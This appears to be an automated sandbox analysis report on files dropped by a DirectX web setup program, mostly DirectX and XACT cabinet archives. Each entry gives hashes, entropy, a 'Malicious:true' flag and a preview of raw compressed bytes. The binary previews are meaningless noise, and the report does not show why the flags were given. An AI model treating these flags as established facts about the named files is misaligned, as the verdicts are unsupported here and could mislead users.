                                                                                              Preview:MSCF.....*......D............................*...#...................)........86u| .xact2_6_x86.cat..;...)....(6.{ .x3daudio1_1.dll.h....d....86o{ .xactengine2_6.dll.W...&L....86.{ .feb2007_xact_x86.inf.....}R....86.{ .xact2_6_x86.inf.;{..w?..CK.wXSI..o..HQY....r..!. .....TV..0..$tTB.....(..((J......(.R.qm.E.d.... ......~...y..93..3gf~.!..Y...^..&.7q. .... .J..`.QPX..-....0... .-.C.b."0N...R.b."..b0.r..U..V.....1..ql.8..1X}.....o.%.t.."B...2...,..@...x..p..0.........AZ.D., ........x.,..C...0.k....aH.........U.V.V.....0....P...6..PeN.........../.-.^.x..z}....q........$h08..3.I,..r.........4......!...oh...x.&.C@....p(J0M....d.5......,..XHC....jf.....A.=(..P.CF..}...[..>...?.9$...K....ofa.......5.p.....g.`T.v.{Ks...."2.N..3.2.<.....x...m.y.B...=....k..|%B....!.y...kq..7..{.....j.W).,.>..>.......@..9.A...2..,.8.t`-d+.z....`.....0....6.......{.....X.0q....98.@V.....C 3v..o.x`.#..r.".`V...s.....?G6.#..2.pb.......$.....@...b.n..&....W.._..CB..c..%...HQ.U

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1330042 bytes, 5 files, at 0x44 +A "d3dx9_26_x64.cat" +A "d3dx9_26.dll", flags 0x4, ID 6675, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1339234
                                                                                              Entropy (8bit):7.999619123900207
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:acfUVHkSDmhcG/IQtmLMLfNYIpTTHh0am4l76wbh:XUBvDzfQtCMLfNYqXqal75l
                                                                                              MD5:05103E47F259FA22D27C871E4CDEE7D9
                                                                                              SHA1:502FA5D15FE56DCF64431BB7437E723137284899
                                                                                              SHA-256:794E23D8B08F88BB0D339825B3628C24CD0297195657F9871EE6324786FADA36
                                                                                              SHA-512:180E0ABBD97B6781C6639C6AB2A2355400B8E32784A8469C3CBEDEA23B121CAC5BA17F6AA509610D0A1E5830735455690F574054D6224A6A5D2AE70EDB601835
                                                                                              Malicious:true
                                                                                              Preview:MSCF....zK......D...........................zK...#..............v...7..........2b} .d3dx9_26_x64.cat..|9.7......2]| .d3dx9_26.dll.......9....20| .infinst.exe......:....2.} .d3dx9_26_x64.inf.&...r.:....2.} .jun2005_d3dx9_26_x64.inf.XW&..8..[.... 6.q.....#Q.P...M.$=\7....O.m...D..)j......J.W."...z...B.........<$]@.f.hf....../..K....(`.P.. ....d}.U....rW.q...U..z.3)K....Zl.cI.Fm..7..D.AS..* .H.25@........1....0n(....vs.].mJ..0...Q.A.....c.+P>......O..3)s".N..!..L..':....B.L...h)s.`.U......L....Bzj..%...H2r..J..rP.~.a..T.[.Oc...N!(0..P.B....|Ih...5...A.|.a...,.x.Qa<..~aCT...@...|.G1!|.|!..I..".. z..........S..C..Q.O....x..>...e..C..7.l1l ...@.YD...~L{.)......f..T.Y{...R.!a.}.hAs5..o9..4.w.#.........?|..+.$.r...KG........Q<.KR.....%....W:..8.....ET..>D.[T(..?....I.R3...W...4..C|....v..0.....`.e.Fp|>.<+Q..-..QS/.p.).qZ....GsV.f..PN"5..P>.K..e.Q.~..A...3|..E...D&N:.%...O.......^cc...O.........s.].=,#.je..No.........G..x..#.xg..D.s..}.L.`..|....N`.N......&W..P..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....(......D............................(...#..............G...7..........2b} .d3dx9_26_x86.cat...#.7......2Z| .d3dx9_26.dll......,#....2.} .d3dx9_26_w9x.inf......-#....2.} .d3dx9_26_x86.inf......0#....2.} .jun2005_d3dx9_26_x86.inf...N..>..CK..X....'.. ..P.....&!. .%.A........`.....;v..WTd..........w......{.{..<'...3..;}....=Xv3.e.vc:.yg.i.....1.....V.F.:.fMj ,.|.e.....F..5#?.|6.M.j[Z..k3.....g.f.B(..=v......a<.7..a.=.:...h.f.X6.."..I..I......Od:.!9......~1.H..q.....'....y..\...E..u.S|K.a...:c..B..8g:!?._..E:.A.H...N.a..j..~pI.....V.k.l.W.....X..........`4.2(.....e.>...0...!L..>p.....2d..r<...afffPK.6..t0.V.'HA.....j.o...5B+. .....hy...... M..5t...K.<>..@.G........~h..Xw.B.....F~>.?l..7..].}Xp.m.!......x~6.aY_*.rmH..sr.."Q*..]..d3.{.bXX`P....io...AZ.i..$..1....Gl.....d..AM:6.......p./(..Q.1..1..q....O.c~.c........04...|s3...}..x..I.r..).m.K1.o#.Q.Fa...X7.baY......G{......Z5S.HU..c.tp.z6.4m.B=P...d.6...g.....W..aM...z...L.R.W%...z.F.n.5....54EG.R

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 174825 bytes, 6 files, at 0x44 +A "xact2_2_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):183993
                                                                                              Entropy (8bit):7.996017590596314
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:fC8YuRPaoTUX/SmAwGUGY+geIhVhbjF/kZ8FyQU02JhzqhA7J4rMgThmwQvzb7e:fCoJaoT8/2Z9YA+VhbR8Zwy3RimwQvzm
                                                                                              MD5:D404CCED69740A65A3051766A37D0885
                                                                                              SHA1:288818F41DA8AB694C846961294EE03D52AEA90D
                                                                                              SHA-256:5163AFA067FE2F076AB428DD368BA0A2CF6470457BA528A35E97BE40737A03C0
                                                                                              SHA-512:87998E67B359C2A0D4F05DC102F6C4DB4F260903385B7558A2C1A71436001D5B18F42B984E6B279A8197243593C385D41F51DE630FA31C5CA5140F6970F87657
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................!..............#..................! .........4=< .xact2_2_x64.cat..@..! ....C4)E .x3daudio1_0.dll..g...`.....4.: .xactengine2_2.dll............4.: .infinst.exe.....!......4.; .jun2006_xact_x64.inf............4.; .xact2_2_x64.inf....&9..[.........R.P...?.p.v.K.......AA..;.vDB.*....xUt....=!)"yP..."C. h..F#.....P.l}.epD.....;....7..P...{s7......$.S..q.ce..g8V....&..F~............A.=.....HP@.cB<..FPT....^.......G.....;P.PBz...D...Y.$@..J....5W...%v..p ..D...7.f$)..HyIO.--z.{5.H.;.@Z.n...T)H..G...|....T.. ..!.u0.^..*...0$`...L8.]..h=..@...L....|...4=.z......l.H....h-..l..2P.].$.....v.7...]......K..=`..?......g.....................D*".0....X...0....m.....;..8.1..bCF..J....Mq......V..@...... ..bz..ox...7t...X.~...@...n...........+.V...{..x..(y../o....Q.TC.=..... h...S<J.1...Or...|O.........}.!..h(`.W...t.l....w.m.....1d......~?#..#.K../...."..y_...z$}..s..q.W.....6[.......*x.~H..(>%.R=.....7...=G...Q.........X./.......Ot.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127711 bytes, 5 files, at 0x44 +A "xact2_2_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136903
                                                                                              Entropy (8bit):7.992894428315885
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:D12mlhVvEbdSlFHljhuz+iFmKtp5LW+pc7Y5EExt2KF3:DwkMhqjhuz+efdLy7YSEP2KF3
                                                                                              MD5:CFCCA19D60EC3D822ED5EC8BBADEC941
                                                                                              SHA1:AB0E87182877991810AF48F1478906C1E671829E
                                                                                              SHA-256:23495764ABA10FF35CF9D23AEEFFDF38716219D8A155AE29162F01F7FE6A30CF
                                                                                              SHA-512:2ACAEA2DE2D77BBE8206E8309D48A4CBA432D72FB9BDE2576BCE7A31EE29FDCB0D44C2B996E8DC21A31BCDB03C806E11AD53B74D9C4C972436D5202825900C01
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4=< .xact2_2_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.; .xactengine2_2.dll.W..........4.; .jun2006_xact_x86.inf.....`......4.; .xact2_2_x86.inf.r....8..CK.|.\....l...Y.".....Y.(H^.@.`@$,.Jr...#..+.....'b.'f.......x;..S.TL.....]t.w...{.{..s...........8f.ZC..._.P4..y....R(......'.j...<.%.-k.....M).W..8...V.Y....2`O..>q....jO..1....;.\{...'.=...+-.....:`.....c..t..1o..`<..0G.y..e.r|..r>P..9.({C-.r.@..8~..qs...>6G.r.....@...]0/..Vl.....q....l....j..... .#...o..J.p.6..:w.>..W....iTFi)..<..s#.AX.&..dL.I.vG?.BM.t...._.X...a....%..Wd.*5.$.#{..?G..Gj..ds.._..7@.@JG.G~*]:.=v&..'u.......bb...`g......`..s.)?Rj;..K....#..Im(.....Lq.........'5..p...xl.^..!.05H..P._*.....hf..3c{.H..I|........DB...9.?1..y...}.&;..c......tl...w2..`.:......q{s......`"...R..p..W.p.....vc3...6A..;..v..`b.D..<W-o.....;.....jy.2...zm..t.n.R..B..G...Vq.....).:.M...Ha@...Q..N.0.N.......4`E....(....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 693084 bytes, 7 files, at 0x44 +A "d3dx10_34_x64.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 10180, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):702252
                                                                                              Entropy (8bit):7.999542751209748
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:8B7y3n2GQi70ZEqAEToKVkDYK96luRC/Qwrkxb0b9fhXNkVkN2t3r1:8BO/j0ZWET/isK96luRC/jk49JN2t71
                                                                                              MD5:1AB35D11274D1ADBD316B19C44B9AE41
                                                                                              SHA1:14165EC367CE179588C8A5806FC968FDB49B4ACA
                                                                                              SHA-256:02ED1B5A850EDB52EC174DE177E91842EDC7C5F4C06CEDA5B16F3427DBCD4C99
                                                                                              SHA-512:71C8FAC7C95211D323C4FB6A02916E7D43EE399BBE0F1D983B5AC210F5039B23355F40B36F023F3C36E19787E2871A60CC389E51D6327652CD84D9E3B93D5A4D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....\.......D................'..........\....#..........4...=....).........6.. .d3dx10_34_x64.cat.pa...).....6.. .d3dcompiler_34.dll.h...2......6.. .d3dx10_34.dll.h....F.....6.. .infinst.exe......X.....6.. .d3dx10_34_x64.inf......Z.....6.. .d3dx10_34_x64_xp.inf./....\.....6.. .jun2007_d3dx10_34_x64.inf.........[.....p...R.P...>..s+..A.%..".J8.Z....B.Z......VR.!B.T%AP..H...1....0..~_.Z./_y.l.u....`..[r-..d.wj....B^.QrAc..-../?.....".......A....P4DP{....|.d.t..4.}.W58Ah)...TNRt......2$.....r..q .^...1....... .. 3..*.......|.J..=....N.KB|.{.J...W..1O....Z4...@H...T..p....0}.A...q..-B...I.($.J.K~..G.$..y....8.`$w@|..FO.Km.....#/.P4..3 P..by...e......O....(...]..P>(o..?...#t....P....?b/..(.............g.F*....|T.XPw.P..I.4..x..&PZ.C|8o......8I/..p.....K.(.'a...t.....A~.<.7.9.'...'.....O.p<EO......F.E........e...A{.@=.e...:..y.J......F.z...].......G..{...~z@...S$....'....p}..'......(#..(.......;.~.....hyXVfA............'h....nj.R.p,h........W......G.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Preview:MSCF.... .......D...............i#.......... ....#..............1....).........6.. .d3dx10_34_x86.cat.p)...).....6.. .d3dcompiler_34.dll.h...2S.....6.. .d3dx10_34.dll.I..........6.. .d3dx10_34_x86.inf.i..........6.. .d3dx10_34_x86_xp.inf.c...L......6.. .jun2007_d3dx10_34_x86.inf.....{5..CK.|.|......m:..s66...$.\.-K2...B....-.%..\...zI....-.@...!@..<Z(.@..B..@.?..'.k.......f.67;;;;3..gQi....O.7..F....J.m........".z.=.;9.s.D........P...PV.\.U.D......M...3.{K.k>...[z.u#Q...D,..%.%.$j,@wDT..D..]................8\.S.....X*......$....q..pP>.0.8.(q.IQ..;GGq.H.@...z.F...~(...=............W...9....._A.qtt.D:[.......7D...&..N..ee.J....H..LeS,e...CY....K m..9..\....._.e....E..@R..J)p..~e...I......uA..8<>).X.#....P..O.BN...a9#I})RW..J4P./.i.'..v.Po..5.+K...[..+K..2... `]....@............q.($. <B$...8@..b<." ...b.y..,.<..OK.."*..t..q...{^..5..l........J.(Q.o.Yn.]z.:x6.T..J.Z..zG........ .W..-..l.....2.\O..f/.......TJ&W"S$*.2.@.2.a.*....C.......A...{..!.|. ....UVJ7.#.\T..k..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601814 bytes, 6 files, at 0x44 +A "d3dx9_34_x64.cat" +A "d3dx9_34.dll", flags 0x4, ID 8310, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1611006
                                                                                              Entropy (8bit):7.999795394912666
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:dyO6V3G0SAcId5iPNJKbtZJSlR3Q0872iOda:dyDlSA/5iPNY7Jo3GPOda
                                                                                              MD5:8DBAA3047397EE4CFCA2EFFFCC2DFBD1
                                                                                              SHA1:D88FAD72D7EAF38B8469B2B8492311C39C42BE04
                                                                                              SHA-256:FE4B15931E048C97CBBC26F753093E7D41ECCF174402542631284F8BDB9EE692
                                                                                              SHA-512:1CE01BF0BD4C0D832D95B13E958DA6CB69C0D3949B128FCF40EC59ECC0AD8989B27C91EAC28CD98777D57DFEB811CC1077FDB87348A11B6370D806771D7E742D
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....q......D...............v ...........q...#...................(.........6.. .d3dx9_34_x64.cat.h.D..(.....6.. .d3dx9_34.dll.h.....D....6.. .infinst.exe.....h.E....6.. .d3dx9_34_x64.inf.......E....6.. .d3dx9_34_x64_xp.inf.,.....E....6.. .jun2007_d3dx9_34_x64.inf.....D...[...S ..uM....5!.f...O.....c.F...7..FA,...Jtc.kn$..P..R..Z.$.J.U#!.TJR)..1.!..@C3.........=.G..{#t.,..7V.uh..8..R...9I-d.X...W.vr..V+}NjE...S...pq.l...)V..,Q6..x.Hb.>9XoA.R.=..v......`.4.3...[f)...`.../........Q..........m...{.y2.u.....m.....}2.r.nF.......c0 ...KI.&sD..YD.2.`0...&....x..~......<$bS.l...C..B...~_...~s....V....)+H..!.....G.p..1...Rn<...=.$.SY.W...=..s..{.7%-.qUs.2..IZI)_(I^.%.....0.w8..~.8.....B..b...Sh...=y3....(I]...L....iF<..{oD.......%...8..S.^.$.E..f..P.....d...l..$...O...G.G&............)I..........I.&...8&....wd.RL..B'..*..phbG..B...ED..0..8....M....N..$..*%-..u.k.KS4...Gd.Z..r...SRJI.V........&?4./)..I.|B.I.I....A...I....1..;.+...9.}.?..c...u.3.].T.~j..$1v./_

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....o......D............................o...#..............l....(.........6.. .d3dx9_34_x86.cat.h_5..(.....6.. .d3dx9_34.dll.......5....6.. .d3dx9_34_x86.inf.,.....5....6.. .d3dx9_34_x86_xp.inf.\...7.5....6.. .jun2007_d3dx9_34_x86.inf.A.".l>..CK..\...;T.D...1.(.`...2CH..........`.UD.....b.;va.;*6...w.{.f.l..9.....w?..=k....=.;..........Zh.....<m--.....^..:.z.#_g.~.>.Z.Z..C..|...5..J.P..JKK.(.0...>+.G..~.hy{c....b2.,..!..?E.&.j.1.u.=.1.B...q...p..>...q.Y....x..\6.uB......>........A..A.f.1..{v.Z...F.F.|:.[.Z!..@$.IA.H""ET.J.c.........d..G.....\...xco.#.G......`k?d..E..s...B,........O.0(?..r.......TD..y.W..FkkkC+i...&..!@... ..xP_>(#!...b.O.>,P.8d......lM>..R-t...[.lm2.WS|.u..._.K/.3.3.~.1a....+*....q....o.M.O>o..Y...O*/..B.y_...V..5..5..$#~.+.H..5.B.tu...../.......|.[.(5q.YT5...II..@K._.d0.@M (.U.p...J.!Q_....5.....O....?].k.)..3.u.an}*.....6A. .]].....rg....Z.0...}...u.....*P$g*eq.*.]t/......e.JE."VE.(...LhNu..(...L!g.0...:m:...V(T4~.*^...2...y

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191162 bytes, 7 files, at 0x44 +A "xact2_8_x64.cat" +A "x3daudio1_2.dll", flags 0x4, ID 10131, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200354
                                                                                              Entropy (8bit):7.996324633982409
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:Oxuwfa4lebkGyR+DPZLOYZ9lD7baC+PJEDzfYPO6quXhBhYDLk0siPnJ8WKKiu:Oja4WkNWOYxX1+++vRB200ssJ8G
                                                                                              MD5:B9648D12DF695290BE0479C1E78894C7
                                                                                              SHA1:932627D40A83411F9F4006792ADEEB4C3A74CF37
                                                                                              SHA-256:3F2CA0ACCEF2594FB014296F4111B7FBB59729C5D928B22F7283C392494FEE7C
                                                                                              SHA-512:240B622B02C5FA3D036043ECBE5BF29FEE447147AF36E795BFAE83FAFA35934FC22A3E9CC2D846BD880D7808897355E16696C555146EE69864472D4600AD25B6
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........*........).........6.. .xact2_8_x64.cat.hS...).....6.. .x3daudio1_2.dll.hA..*}.....6". .xactengine2_8.dll.h..........6.. .infinst.exe............6.. .jun2007_xact_x64.inf............6.. .xact2_8_x64.inf.%..........6.. .xact2_8_x64_xp.inf.g@../..[.........R.P...?...XZ.R+...k...h...T.N.B..)...HX.F...J.V..Ty......hD......}.Q.I..lb...^.+..v.;.U.F..i.-.....4........B.$._H...@`................P..7.....,$0...Z/...1+.#.*......tAK.....^.$:.. .G..ma.....B.:<Lv!..p....I...a.A.C$.:....I..$?..I8T-u....o......1,"(CA.....!.(I@.yB......W..@.<3.!.(....1u!........@..y<....@d....2?I..d.ax.....@..WA.2..\....S...z........8.|..'......yD.y...............A'$..A(8.H3'S.#>.P...@..f.8....._..`...(f.'?T....Q..Y.Y.Es..............u(..@...'..zu ...?."(.v.. .=..p%.~..X.;.........g.......+...O...P\\....Y....~H......yd....u.v~y .... .z.B.*...0...! "..b7/..v..J...{...A...~.!y..O=...sR.Uy..>..$L$0.&2`.p..2M.v} p'l...*.....w....'..}.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 146949 bytes, 6 files, at 0x44 +A "xact2_8_x86.cat" +A "x3daudio1_2.dll", flags 0x4, ID 9016, number 1, extra bytes 20 in head, 10 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):156117
                                                                                              Entropy (8bit):7.994909703055095
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tG7RXkNHRrOaYVD5yEThWmLksx2MeEm6oOD4+3y20OXtGhlYRTPZDT5P/lJXptA:eX8KVD5yETfLksAMUHo4+T5IhlYRDZDy
                                                                                              MD5:001CFF513A31EE082133E7BA3B0D71A2
                                                                                              SHA1:4517610A25239A16C26CA9890E1F0E52DDA3781A
                                                                                              SHA-256:245B0C554CBE2677939A70E5C4C6666B1B43D10D47980223F8CDEADB2D0EB76B
                                                                                              SHA-512:7119F6CA16FE6D968310F34828F30D8144531B89583CFD529056D2E31D5164FC65136FA9015B69849F724EC641A9291AC644C91CC3FA8EBDD4DAF9CF5A665A7F
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D...............8#...........>...#...................).........6.. .xact2_8_x86.cat.hG...).....6.. .x3daudio1_2.dll.h...*q.....6. .xactengine2_8.dll.o..........6.. .jun2007_xact_x86.inf............6.. .xact2_8_x86.inf............6.. .xact2_8_x86_xp.inf......4..CK.|.@S..I..........c....B(..........A..{..b...;XA.`.r,...Q..l.gO@.|....w....svw........8........:.~P.t..d.....T..+GIQah7......_WT..H.S2.)...R@..0...L...R+.;..=.....\.).Y.K.c.1..q.M.&.c9.:.S.WZ.'.b@.2.....q..].1!.F.=.`v.)..9.....1y...&P.....,IN.f.q...}8*.......p......... .~...;.8.'...PC...L...F....F.R1N.1....8...I..*.FU((........X(...bQ.......G.......O...`lj..F.l.>..AS.t/s._.!..{Rv!\MArc.DR.AZ.P....=`..{....-j..!M]..0.o.'gX.L..R..:...k<-.....p.......... .1)....m3.).._1..K.R7.@n.7.......0&d.....,..a.L.I,...?..>..F..8l.....=7Gr?.*.`../...!.9...0o,.s.^I.QT:..Q.t.........D.IR...b,..V[..M....j.....?.I.$..w`.#..\....B.aX{.C....V7.P7.P..P.$..V....AL..I.X@.R.TU.......^.k..{..|...:..8.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx10_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................#...............#..............=....$.........8wq..d3dx10_38.dll......$.....8wq..D3DCompiler_38.dll.f(..(......8.r..d3dx10_38_x86.cat.I..........8.r..d3dx10_38_x86.inf.i..........8.r..d3dx10_38_x86_xp.inf.c...@......8.r..Jun2008_d3dx10_38_x86.inf...E7%,..CK..\.....\./BS3...$.......p.&..x"........h....J.,5.,._.e....y..-y...#.......YXPP+..y.......y....o*.&..........\....i...YQcs..u.77K.8..h......h..]L...y6.bc..S.\.Y..]..aM.iyo.Xr..2....w...^V.Y.v)..s..w..;..z...........S..WY.b...!....q..W............y.~.x...P..!z.S.....2..{W.x.tJ.....Y....'o5"dE...(...|o.U'.tpJ....8..4.j.vT.+TrVWy.`.P..{![...O.<.!...F...V.........C.k.E.h._..AM..+...E.jG.U.R.F:.].E...Xvw.?....'..,....................A-p...l.[.J....4.. .$.,...`2X.W.c..=Y.>........i.....A-p.?.....`.8..qp.`...A.....P_1.....? ]O....A?P.&........%..c. ..v...,h.=...AK0........k......d..... ....A{....... .|o......&..|......0........d.....[m......X...%C.D.2X.....'&.4..@o......98.~..c

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx9_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
